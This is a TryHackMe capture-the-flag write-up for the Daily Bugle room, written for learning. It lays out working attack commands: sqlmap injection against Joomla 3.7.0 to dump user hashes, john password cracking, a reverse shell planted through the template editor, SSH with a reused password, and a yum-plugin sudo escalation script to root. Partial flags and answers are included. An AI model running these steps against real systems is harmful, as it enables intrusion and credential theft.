Complete TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle is a challenge to compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

Difficulty: Hard

TryHackMe Daily Bugle

Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp

Daily Bugle WriteUp

Access the web server, who robbed the bank?

TryHackMe Daily Bugle
TryHackMe Daily Bugle

Scan Target Machine with Nmap

nmap -sV -sC --script=vuln  10.10.155.246
Complete TryHackMe Daily Bugle WriteUp

Find Joomla Version

We have the Joomla version on nmap output but if you need to check it manually

wget http://10.10.204.53/README.txt
Complete TryHackMe Daily Bugle WriteUp
wget http://10.10.204.53/administrator/manifests/files/joomla.xml 
Complete TryHackMe Daily Bugle WriteUp

Crack Jonah Password

Crack the Hash? but where is the hash?

We have Joomla CMS with version 3.7.0 and Nmap tell us we have a public exploit, let’s search for it:

searchsploit joomla 3.7.0
Complete TryHackMe Daily Bugle WriteUp

Great we find one that uses SQLInjection into one vulnerable parameter.

Copy exploit to our home folder:

searchsploit -m 42033.txt
Complete TryHackMe Daily Bugle WriteUp
less /root/42033.txt

SQLMap Command

Verify All Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Read System Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hex

Read Tables from Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex
Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp

We have 72 tables, what is the users tables?

Complete TryHackMe Daily Bugle WriteUp

Let’s extract #__users table data hoping to find our Jonah Password Hash

Extract data from #__users tables

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex
Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp

Crack Jonah Password Hash

john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txt
john jonah_hash.txt --show

Login Joomla Administration as Jonah

http://10.10.204.53/administrator
ũsername - jonah
password - cracked from Hash
Complete TryHackMe Daily Bugle WriteUp

Upload Reverse Shell to Joomla

http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D
Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp
pwd

Investigate File System

First let’s investigate the Joomla folder

cd /var/www/html
ls -la
Complete TryHackMe Daily Bugle WriteUp
Complete TryHackMe Daily Bugle WriteUp

Great we have mysql root password, let’s check if mysql daemon is running as root:

ps -aux | grep mysql*
Complete TryHackMe Daily Bugle WriteUp

No success Mysql service is running as mysql user 🙁

What if thw user jjamson use the same password as mysql root user?

Let’s try to create a SSH connection as jjameson

ssh [email protected]
Complete TryHackMe Daily Bugle WriteUp

Find User Flag

Complete TryHackMe Daily Bugle WriteUp

Elevate Privileges from JJameson user to Root

sudo -l
Complete TryHackMe Daily Bugle WriteUp

Has we can see jjameson user can execute yum command with sudo, let’s find hot to elevate privileges using yum.

cd /tmp
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y
Complete TryHackMe Daily Bugle WriteUp

Answer the questions below

What is the Joomla version?

3.7.0

*Instead of using SQLMap, why not use a python script!*

What is Jonah’s cracked password?

spider*RFS*

What is the user flag?

27a260fe3cba712cfde*RFS*

What is the root flag?

eec3d53292b1821868*RFS*

GTFOBins

Exploit Joomla 3.7.0

Room nameDaily Bugle
OSLinux
DifficultyHard
Room Linktryhackme.com/room/dailybugle
CreatorTryhackme